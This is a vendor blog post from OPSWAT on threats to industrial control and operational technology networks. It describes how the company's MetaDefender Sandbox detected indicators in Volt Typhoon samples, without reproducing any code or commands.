We utilize artificial intelligence for site translations, and while we strive for accuracy, they may not always be 100% precise. Your understanding is appreciated.
Home/
Blog
/
Navigating the Cybersecurity Landscape of ICS and…
Navigating the Cybersecurity Landscape of ICS and OT Networks: Insights and Solutions
by
OPSWAT
Share this Post
Introduction
In the ever-evolving world of cybersecurity, Industrial Control Systems (ICS) and Operational Technology (OT) networks represent a significant area of concern. These systems are not only vital to the continuity of business operations but are also integral components of a nation's critical infrastructure. OPSWAT's MetaDefender Sandbox (previously known as Filescan Sandbox) team has been diligently monitoring ICS/OT risks and has observed persistent and potentially high-impact activities.
The Current Threat Landscape
Recent patterns in cybersecurity threats have shown a worrying trend of attacks: state-sponsored groups have started to specialize for ICS such as Sandworm (Russia) and Volt Typhoon (China), while cybercriminals are aware of the impact severity against industrial systems. Security forces across the board recognize the importance of these threats to all industry sectors, leading to the release of joint reports and campaigns aimed at bolstering ICS security.
Persistent Issues and Recommendations
One of the longstanding recommendations to mitigate these risks is to reduce system exposure. However, the prevalence of exposed systems continues to be a troubling issue within the cybersecurity landscape. As techniques for reconnaissance and exploitation become more widely disseminated, the threat of opportunistic attacks looms larger, allowing threat actors with lower level of sophistication to have an impact against critical systems. A report from September highlighted an alarming trend: OT/ICS cybersecurity incidents in the last three years have surpassed the total reported from 1991 to 2000. This statistic alone underscores the escalating challenges faced by those responsible for the security of these environments.
Defending against the threat
Frameworks and Updates
Recognizing the need for specialized attention, the MITRE corporation developed an ICS-specific ATT&CK matrix, to provide a common language for inter-sector communication, and to empower underrepresented sectors to leverage its mappings, fostering meaningful communication about risks and threats. The relatively new continues to be meticulously updated, with the latest version released just last month.
The Interconnectedness of IT and OT
The OPSWAT MetaDefender Sandbox team, while keeping abreast of these updates, emphasizes the intrinsic connection between IT and OT, since IT assets are present across all the levels of the Purdue Model, and not only at the top.
Compromised IT Leads to Comprised OT. Respondents are predominantly concerned with and have experienced ICS incidents involving malware threats or attackers breaching the IT business network. These breaches often enable access and pivoting into the ICS/OT environment. Compromises in IT systems leading to threats entering OT/ICS networks ranked highest, followed by compromises of engineering workstations and external remote services.
The SANS 2023 ICS/OT Cybersecurity Report
sponsored by OPSWAT
The Common Denominator: Malicious Files
Across the spectrum of ICS-related cyberattacks, the presence of malicious files is a consistent factor, regardless of the vector of entry—be it IT or OT systems. This is where solutions like the MetaDefender Sandbox come into play. Such tools are designed to scrutinize files traversing the defined perimeters of an organization's network, tailored to different contexts for optimal performance, including within air-gapped environments.
OPSWAT's Adaptive Sandbox combines different sets of threat indicators using in-house analyzers and other widely known such as Yara rules. Both attacks previously referenced from Volt Typhoon and Sandworm heavily relied on Living-Off-the-Land binaries (LOLBINS) for which MetaDefender Sandbox implements many indicators. However, the earliest attack poses a good example of the combination of indicators due to the availability of samples. The first reported payload is a batch script containing a base64 encoded Powershell command which triggers two interesting indicators for this case, among others.
Figure 1 Analysis of Volt Typhoon's payload Report Link
The origin of the previously shown indicator is the script emulation, where it can also be observed other relevant indicators. The following screenshot shows a different indicator with higher severity, triggered from the decoded base64 content of the script. Additionally, both identified elements are accordingly mapped with the corresponding MITRE ATT&CK techniques.
Figure 2 Analysis of Volt Typhoon's payload Report Link
Additionally, this same attack involved the usage of Fast Reverse Proxy samples which, despite being UPX packed, MetaDefender Sandbox was able to unpack allowing several additional indicators to match on the extracted file and identify the threat.
Figure 3 Unpacked Volt Typhoon's FRP sample Report Link
Figure 4 Yara identifying the unpacked sample as FRP Report Link
Conclusion
As the threat landscape evolves, so must our defenses. OPSWAT's commitment to the security of ICS and OT networks remains steadfast, and the MetaDefender Sandbox team is dedicated to providing actively updated solutions that address these emerging challenges. Stay informed, stay prepared, and stay secure.
